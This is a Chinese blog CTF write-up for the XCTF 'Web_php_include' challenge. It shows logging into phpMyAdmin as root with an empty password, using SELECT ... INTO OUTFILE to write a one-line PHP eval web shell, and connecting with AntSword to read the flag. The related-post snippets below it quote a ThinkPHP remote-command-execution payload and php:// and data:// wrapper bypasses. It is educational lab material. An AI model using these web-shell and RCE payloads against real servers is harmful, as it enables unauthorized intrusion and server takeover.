【XCTF高手进阶区】web4_Web_php_include writeup(三)

最新推荐文章于 2021-04-26 00:03:30 发布
最新推荐文章于 2021-04-26 00:03:30 发布
阅读量297 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mitchell_Donovan/article/details/113286024
版权

web4_Web_php_include

原题链接

key:SQL注入+一句话木马

 

此题其他解法👇

XCTF高手进阶区 web4_Web_php_include writeup(一)

XCTF高手进阶区 web4_Web_php_include writeup(二)

XCTF高手进阶区 web4_Web_php_include writeup(四)

 

①又双叒叕是这道题,不过这一次我们我们用一个更加风骚的解法

老话说得好,如果没思路了就去扫描一下👇

扫描发现了phpmyadmin后台👆

 

②双击它进入登录页面

username为root,password为空,登录👇

 

③进入SQL语句输入的地方

先输入并执行如下SQL语句👇

show variables like "secure_file_priv"

phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马

 

④编辑一句话木马并执行

select "<?php eval($_POST['shell']); ?>"into outfile '/tmp/Mitchell.php'

传🐎成功

为什么传🐎的目录是tmp

 

⑤用蚁剑连接👇

一眼就找到了flag文件👇

 

 

 

Mitch311
关注
专栏目录
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 318
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
XCTF 逆向进阶Windows_Reverse1——WriteUp
qq_43547885的博客
02-20 1124
题目链接: Windows_Reverse1 答题过程 脱壳 首先将程序拖入 Exeinfo PE 中查看相关信息: 发现程序有upx壳, 使用upx -d将壳脱去: 脱壳显示成功, 但奇怪的是程序一运行就闪退. 先不讨论该问题, 最后再来研究. IDA PRO 分析程序 用 IDA PRO 打开该程序, 直接查看反编译代码, 发现程序逻辑非常清晰:int __cdecl main(int...
攻防世界web Web_php_include writeup
qq_45837896的博客
07-18 169
看题目所给,页面会把所有传入页面url的php://给替换掉 查询php://得知应该是php伪协议的知识点 从官网得知data://伪协议从而不使用php:// 用法:data://text/plain;base64, 也就是说页面会执行后面的base64代码 ...
攻防世界 Web_php_include write up
giaogiao123的博客
02-19 323
首先看题目注意两点 1要get方式提交page 2要绕过strstr()函数,要绕过str_replace函数因为他会把php://换成空 3文件包含(要想到一句话木马) 先补充一些知识关于php://input 因为strstr是对大小写敏感的,用大写PHP绕过检测,同时绕过str_replace函数 strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是...
XCTF高手进阶web4_Web_php_include writeup(二)
Mitchell_Donovan的博客
01-28 2108
web4_Web_php_include 原题链接 key:data://伪协议执行命令 ①打开页面还是那串代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 但是这次我们选择另一种
XCTF高手进阶web4_Web_php_include writeup(四)
Mitchell_Donovan的博客
01-28 347
web4_Web_php_include 原题链接 key:data://伪协议+一句话木马 ①又双叒叕又双叒叕是这道题,不过这次用的是比前个都秀的解法 还记得在(二)中我们用到的data://伪协议吗 不记得的话先来复习一下吧???? data://伪协议 ????直接形式 data://text/plain,<?php 执行内容 ?> ????base64加密形式 data://text/plain;base64,执行内容加密后的代码 ②这一次既不需要sy
XCTF-高手进阶Web_php_include
1stPeak's Blog
03-02 603
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 看源码,可能是不想让我们使用php://in...
XCTF高手进阶web4_Web_php_include writeup(一)
Mitchell_Donovan的博客
01-27 374
web4_Web_php_include 原题链接 key:文件包含 ①页面打开后是一串php代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 先来简单了解一下本题涉及到的几个ph
XCTF-WEB-Web_php_include
Lorezon的博客
03-15 692
打开题目出现源码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> str函数对大小写敏感,考...
XCTFWeb进阶部分 WriteUp(一)
野原新之助
10-24 826
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 244
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
XCTF 攻防世界】WEB 高手进阶 Web_php_include
weixin_45844670的博客
08-23 1708
目录基础题解本题相关知识点:一题多解:**php文件包含****一句话木马****data://伪协议**data://伪协议+一句话木马 基础题解 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 上面这段
【CTF工具】GitHack下载安装与使用(windows下)
Mitchell_Donovan的博客
04-24 7740
下载方法 ①从github官网下载https://github.com/lijiejie/GitHack ②从codechina镜像站下载https://codechina.csdn.net/mirrors/lijiejie/githack 使用方法 下载之后解压缩,并通过cmd使用 具体操作???? ①win+R打开cmd终端,进入githack的目录下 ②使用如下代码进行下载???? python GitHack.py http://www.openssl.org(目标网址)/.g
【CTF工具】GitHack下载安装与使用(linux下)
Mitchell_Donovan的博客
04-24 5158
下载方法 ①直接通过git下载 git clone https://github.com/lijiejie/GitHack ②通过git镜像站下载 git clone https://github.com.cnpmjs.org/lijiejie/GitHack 使用方法 ①打开终端,进入到GitHacker的目录下 ②运行如下代码???? python GitHack.py http://www.openssl.org(目标网址)/.git/ 执行后会在本目录生成以网址为名字的文
【CTF工具】网址扫描器dirsearch下载安装与使用(linux下)
Mitchell_Donovan的博客
04-26 4330
dirsearch是一个python开发的目录扫描工具 和我们平时使用的dirb、御剑之类的工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口 Linux下的使用教程如下: 下载安装 打开linux终端输入以下代码???? git clone https://github.com/maurosoria/dirsearch.git 使用说明 在终端中打开dirsearch文件夹???? cd dirsearch/ 输入下列命令开始网址扫描???? ./dirsearch.
BugkuCTF web18_秋名山车神 writeup
Mitchell_Donovan的博客
01-11 2543
web18_秋名山车神 原题链接 key:python脚本 ①题目环境里的网页长这样式的???? 意思是2s内让我们算一个变态表达式,疯了吧 刷新多次,发现数字是变化的,问题更严重了...... 不过刷新过程中发现了要提交的参数value???? ②不妨写个(白嫖)python脚本吧 本题采用正则表达式,如果不熟悉这个可以先看看教程:正则教程 import requests #引入request库 import re #引入re库 url = '''http:/
HashTeam web_阴间2048 writeup
Mitchell_Donovan的博客
12-29 1611
HashTeam web_阴间2048 原题链接
【CTFHub】文件上传漏洞_00截断
Mitchell_Donovan的博客
04-20 1519
文件上传_00截断 原题链接 key:PHP的%00截断 ①原题界面如下???? 直接上传.php文件显然不行,再尝试上传图片马还是不行 ②burpsuite抓包,放到repeater中???? go一下在回应报文里找到源码???? if (!empty($_POST['submit'])) { $name = basename($_FILES['file']['name']); $info = pathinfo($name); $ext = $inf
BugkuCTF web11_网站被黑 writeup
Mitchell_Donovan的博客
12-21 1347
web11.网站被黑 原题链接 key:御剑后台扫描+burpsuite密码爆破 知识补充: webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文 与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,"web"的含义是显然需要服务器开放web服务,"shell"的含义是取
pure_color xctf
最新发布
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值